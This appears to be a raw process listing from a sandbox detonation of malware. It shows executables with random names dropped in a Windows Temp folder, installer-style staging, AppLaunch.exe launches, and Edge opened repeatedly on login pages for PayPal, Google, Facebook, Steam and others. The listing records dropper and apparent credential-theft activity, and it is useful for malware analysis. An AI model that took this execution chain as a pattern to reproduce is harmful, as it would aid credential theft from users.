C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3940 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4212 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4388 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4640 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4848 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6088 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffd933d46f8,0x7ffd933d4708,0x7ffd933d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6216 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6396 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x144,0x170,0x7ffd933d46f8,0x7ffd933d4708,0x7ffd933d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffd933d46f8,0x7ffd933d4708,0x7ffd933d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3888 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6696 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5028 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7512 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7288 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7580 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7964 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7964 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8156 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7544 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\13A2.exe

C:\Users\Admin\AppData\Local\Temp\13A2.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\hK1FU6RE.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\hK1FU6RE.exe

C:\Users\Admin\AppData\Local\Temp\14CC.exe

C:\Users\Admin\AppData\Local\Temp\14CC.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\MT2wE8kW.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\MT2wE8kW.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\vv7qj8ed.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\vv7qj8ed.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\ih2Pf8XZ.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\ih2Pf8XZ.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Av10fD7.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Av10fD7.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1644.bat" "

C:\Users\Admin\AppData\Local\Temp\176E.exe

C:\Users\Admin\AppData\Local\Temp\176E.exe

C:\Users\Admin\AppData\Local\Temp\1888.exe

C:\Users\Admin\AppData\Local\Temp\1888.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\1B68.exe

C:\Users\Admin\AppData\Local\Temp\1B68.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffd933d46f8,0x7ffd933d4708,0x7ffd933d4718

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2dU814HH.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2dU814HH.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 6196 -ip 6196

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6196 -s 540

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6440 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4780 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\2348.exe

C:\Users\Admin\AppData\Local\Temp\2348.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xdc,0x108,0x7ffd933d46f8,0x7ffd933d4708,0x7ffd933d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8496 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffd933d46f8,0x7ffd933d4708,0x7ffd933d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8120 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd933d46f8,0x7ffd933d4708,0x7ffd933d4718

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5896 -ip 5896

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd933d46f8,0x7ffd933d4708,0x7ffd933d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8204 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5896 -s 768

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3516 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7760 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffd933d46f8,0x7ffd933d4708,0x7ffd933d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd933d46f8,0x7ffd933d4708,0x7ffd933d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd933d46f8,0x7ffd933d4708,0x7ffd933d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8272 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4800 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9060 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9280 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=9548 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=9612 /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x308 0x46c

C:\Users\Admin\AppData\Local\Temp\4894.exe

C:\Users\Admin\AppData\Local\Temp\4894.exe

C:\Users\Admin\AppData\Local\Temp\4B74.exe

C:\Users\Admin\AppData\Local\Temp\4B74.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\kos4.exe

"C:\Users\Admin\AppData\Local\Temp\kos4.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\AppData\Local\Temp\is-57ARK.tmp\LzmwAqmV.tmp

"C:\Users\Admin\AppData\Local\Temp\is-57ARK.tmp\LzmwAqmV.tmp" /SL5="$100192,3039358,68096,C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\670B.exe

C:\Users\Admin\AppData\Local\Temp\670B.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe

"C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe" -s

C:\Users\Admin\AppData\Local\Temp\6E01.exe

C:\Users\Admin\AppData\Local\Temp\6E01.exe

C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe

"C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe" -i

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Delete /F /TN "HAC1030-3"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 5472 -ip 5472

C:\Users\Admin\AppData\Local\Temp\799B.exe

C:\Users\Admin\AppData\Local\Temp\799B.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5472 -s 784

C:\Users\Admin\AppData\Local\Temp\7FE5.exe

C:\Users\Admin\AppData\Local\Temp\7FE5.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

